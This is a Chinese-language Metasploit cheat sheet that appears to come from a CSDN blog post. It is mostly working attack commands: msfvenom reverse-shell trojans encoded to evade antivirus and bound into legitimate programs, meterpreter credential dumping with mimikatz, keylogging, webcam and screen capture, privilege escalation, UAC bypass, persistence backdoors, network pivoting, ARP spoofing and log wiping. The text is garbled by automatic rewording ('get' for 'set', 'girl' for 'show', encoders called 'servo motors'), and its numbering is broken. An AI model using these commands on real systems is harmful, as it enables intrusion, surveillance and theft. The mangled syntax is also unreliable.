MSF常用命令

Msf是kali下的这款强劲的专用工具,开源系统的网络安全问题测试工具前渗入后渗入环节都用获得,只有還是后渗入环节用的多。

Msf用途大概就是说exploit进攻,cve进攻,远程控制木马病毒进攻运用。

Msfconsole 开启msf

Msfconsole -h 协助选择项

Banner 用以查询metasploit的版本信息,运用控制模块总数、payload总数

控制模块详细介绍:

Exploits 渗入进攻控制模块 主要用于进攻方式

Auxiliary 輔助控制模块 主要用于信息内容搜集

Payloads 进攻荷载控制模块 主要用于进攻实际效果、总体目标

Encodes 编号控制模块 主要用于编码转换、掩藏

Post 后渗透测试控制模块 主要用于渗入后的解决,比如留有侧门等

通常应用步骤:

search 名字 检索系统漏洞

use 控制模块 挑选进攻控制模块

get RHOST ip 设定进攻ip

get RPORT 445 设定进攻端口号

girl payloads 查询能用payloads

get payload windows/meterperter/bind_tcp -设定进攻荷载

get LHOST ip 监视应用程序ip

get LPORT 4444 设定监视的端口号

girl options 查询设定好的主要参数

exploit 进行进攻

info 查询所属控制模块的信息内容

back 撤出当今系统漏洞控制模块,挑选别的的系统漏洞控制模块

exploits:运用漏洞开展进攻

payload:取得成功 exploit 以后,真实在总体目标系统软件实行的编码或命令

connect 用以远程控制连接服务器,通常用以内部网渗入。

connect 192.168.9.1 8080 connect+iP+服务器端口

exit 撤出msfconsole的指令。

search 系统漏洞名字 开展系统漏洞控制模块或软件的搜索

远程控制木马病毒:

转化成Shellcode指令:

msfvenom -p windows/meterpreter/reverse_tcp lhost=ip lport=端口号 -f exe -o /root/feizhu/fz.exe

Msfvenom适用诸多自然环境下payload有效载荷,如linux,android,windons等

应用指令查询msfvenom –list payloads 依据必须挑选荷载

对shellcode开展编号:

msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 13 -b ‘\x00’ lhost=ip lport=端口号 -f exe -o /root/feizhu/zhu.exe

Msfvenom适用的伺服电机许多,每一伺服电机的免杀实际效果都不同,依据必须挑选。

查询伺服电机 msfvenom –list encoders

注:并不一定的编码方式都会windows系统软件上能用

Msf终究是开源系统的,免杀实际效果不太好。

我们普遍的免杀方法有:改动特征码/改动程序流程通道点/花指令/加壳等

将转化成的木马病毒捆缚到别的程序流程中:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=ip LPORT=端口号 -e x86/shikata_ga_nai -x IPradar5.exe(捆缚的程序流程) -i 13 -k(将系统进程提取) -f exe -o /root/feizhu/fz.exe

监视shellcode (当木马病毒在总体目标机实行后,用此作用取得应用程序,深化渗入)

use exploit/multi/handler 挑选控制模块

get payload windows/meterpreter/reverse_tcp 设定的payload荷载要跟我们转化成木马病毒时的荷载相同。

get LHOST ip 设定监视的ip

get LPORT 4444 设定监视的端口号

exploit 刚开始监视,进行此步后,在总体目标设备实行木马病毒只能取得session应用程序。

需注意payload微小差别:

人们挑选的payload监听器是有差别的:

windows/shell_reverse_tcp 这一是归属于Unstaged。即必须应用nc监视端口号来拿

到反跳shell 。 比如:nc -nvlp [服务器端口]

windows/shell/reverse_tcp 这一是归属于Staged。即必须应用msf的

exploit/multi/handler来取得session应用程序。

那么根据系统漏洞进攻或是远程控制木马病毒取得sessions应用程序以后,更进一步渗入,则必须的指令给出:

Meterpreter应用程序下:

background 把meterpreter后台管理脱机

sessions -l 查询全部的应用程序

sessions -i 1 挑选应用程序

shell 获得总体目标服务器的远程命令行shell

ipconfig 查询互联网主要参数

getwd 获得系统软件工作中的当前目录

getuid 查询早已得到的管理权限

portfwd 端口转发 总体目标服务器上打开了3389,可是只容许特殊iP浏览,进攻服务器没法联接,可以应用portfwd指令把总体目标服务器的3389端口转发到别的端口号开启

portfwd Add -l 你该机的监视端口号 -r 127.0.0.1 -p 3389 将总体目标设备3389发送到kali当地端口号

rdesktop 127.1.1.0:2222 实行windows远程控制连接,这一端口号就是说上一步发送的端口号。

upload 文件上传到总体目标服务器

upload fz.exe C:\windows\system32\

download 将总体目标服务器上的文件下载到人们的进攻服务器上

download C:\users\wd.txt /root/feizhu/

search -d c:\ -f *.doc 检索特定尾缀文档

route 显示信息总体目标服务器上的服务器路由表

sysinfo 查询总体目标主机系统信息内容

systeminfo 查询系统软件详细资料及傻瓜包信息内容

migrate将meterpreter应用程序移殖到另外系统进程

migrate 1668(引入系统进程的pid) 将木马病毒系统进程引入到系统软件别的系统进程

hashdump 载入哈希值

load mimikatz 起动mimikatz

wdigest 载入?没苈耄╩imikatz下指令)

run getgui -e 打开远程桌面服务

run getgui -u feizhu -p feizhu 加上登录远程桌面的账户密码

提权:

应用程序下要getsystem 取得系统软件最大权限

取得meterpreter应用程序后提高最大权限:

1.systeminfo 查询漏洞补丁信息内容,搜索有关上溢系统漏洞提权

2.use+系统漏洞控制模块 应用系统漏洞控制模块

3.get sessions 1 设定开展提权的应用程序设备

11.查询回到信息内容,会有个新的system管理权限系统进程,用migrate将本来的应用程序系统进程引入到system系统进程中,取得最大权限。

应用Bypassuac提权:(当实行getsystem失效时)

1.search bypassuac 检索控制模块

2.use 控制模块名字 应用控制模块

3.get sessions 应用程序名字 挑选提权的应用程序

11.run 实行

4.会回到1个新的应用程序,进入应用程序若不是最大权限,实行getsystem只能。

取得meterpreter应用程序后怎么才能合理的提权呢?

大伙儿了解msf中内置的系统漏洞控制模块过多,全部我们可以用msf内置指令协助我们开展提权。

1.把session应用程序挂上去后台管理

2. use post/multi/recon/local_exploit_suggester

3.get LHOST ip

11.get session 1

4.exploit

实行以后见到的結果就是说对于当今系统软件将会提权取得成功的漏洞利用控制模块。

键盘记录器作用keyscan:

keyscan_start 打开纪录总体目标服务器的键盘输入

keyscan_dump 輸出捕获到的总体目标键盘输入空格符信息内容

keyscan_stop 终止键盘记录

run vnc 打开实时监控界面

webcam_stream 打开监控摄像头

migrate 616 关掉另一方服务器防火墙

screenshot 手机截图

后渗入控制模块应用:

run post/windows/gather/enum_applications 获得总体目标服务器程序安装信息内容

run post/windows/gather/dumplinks获得总体目标服务器上近期浏览过的文本文档、连接信息内容

run post/windows/gather/enum_Ie 载入总体目标服务器ie浏览器电脑浏览器cookies等缓存文件信息内容,嗅探总体目标服务器登陆过的各种账户密码,信息内容储放在/root/.msf5/loot/文件目录下。

msf路由器发送控制模块:

MSF架构中内置的1个路由器发送作用,其保持全过程就是说MSF架构在早已获得的meterpreter shell的基本上加上这条前往“内部网”的路由器,此路由器的下一个跳发送,即网关ip是MSF进攻服务平台与黑客攻击总体目标创建的1个session应用程序 。

run set_local_subnets 查询已拿到的总体目标服务器的内部网iP段状况(路由器详细地址)

run autoroute -s ip/28 加上路由器(把这一ip段范畴加进路由器)

run autoroute -p 查询加上的路由器

+run autorouute -d 删掉加上的路由器

随后,我们能用进攻内部网别的设备:

fping -asg 192.168.93.0/28 查询内部网免费在线服务器

arpspoof -i eth0 -t 总体目标iP 网关ipiP ARP蒙骗

长久侧门:

run persistence -S -U -X -i 5 -p 端口号 -r ip

-S:开机启动时载入

-U:客户登录时载入

-X:启动时全自动载入

-i:回连的间隔时间

-r:你的接受shell的电脑上iP

clearev 擦掉印痕

©️2020 CSDN 皮肤主题: 技术黑板 设计师:CSDN官方博客 返回首页